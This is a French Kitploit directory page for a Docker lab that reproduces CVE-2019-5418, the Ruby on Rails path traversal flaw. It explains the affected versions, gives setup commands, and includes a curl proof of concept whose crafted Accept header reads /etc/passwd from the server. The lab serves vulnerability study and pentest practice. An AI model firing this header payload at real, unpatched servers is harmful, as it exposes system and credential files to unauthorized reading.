Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5418 — Environnement de laboratoire basé sur Docker pour l'exploit de traversée de chemin CVE-2019-5418 Ruby on Rails, avec des commandes curl PoC pour lire des fichiers arbitraires du serveur via des en-têtes Accept conçus. | Kitploit
Outils/GitHubGitHub/daehyeok0618/cve-2019-5418
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubdaehyeok0618/cve-2019-5418

CVE-2019-5418

Environnement de laboratoire basé sur Docker pour l'exploit de traversée de chemin CVE-2019-5418 Ruby on Rails, avec des commandes curl PoC pour lire des fichiers arbitraires du serveur via des en-têtes Accept conçus.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-5418 : Ruby on Rails – Traversée de chemin et lecture arbitraire de fichiers

Ce projet est un environnement permettant de s'entraîner et de reproduire la vulnérabilité d'inclusion de fichier local (CVE-2019-5418) de Ruby on Rails.
Cette vulnérabilité permet de lire des fichiers arbitraires sur le serveur via une traversée de chemin exploitant l'en-tête Accept.

Résumé de la vulnérabilité

Ruby on Rails est un framework d'applications web qui permet aux développeurs de créer des applications web rapidement et facilement.

L'Action View de Ruby on Rails des versions <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 et v3 présente une vulnérabilité d'inclusion de fichier local.

Lorsque render file est utilisé dans un contrôleur pour afficher une vue située à l'extérieur de l'application, Rails détermine l'emplacement du fichier en fonction de l'en-tête Accept fourni par l'utilisateur. En envoyant un en-tête Accept contenant une valeur telle que Accept: ../../../../../../../../etc/passwd{{, l'attaquant peut exploiter la vulnérabilité de traversée de chemin pour lire des fichiers arbitraires.

Configuration de l'environnement

Exécutez les commandes suivantes pour compiler et démarrer Ruby on Rails 5.2.2 :

root@kitploit:~
docker compose build
docker compose up -d

Une fois le serveur démarré, vous pouvez visiter la page Ruby on Rails en accédant à http://your-ip:3000. image1

Exemple de PoC

root@kitploit:~
curl -H "Accept: ../../../../../../etc/passwd{{" http://localhost:3000/robots

image2 Nous avons réussi à lire un fichier arbitraire sur le serveur via l'en-tête Accept.

Télécharger l’outil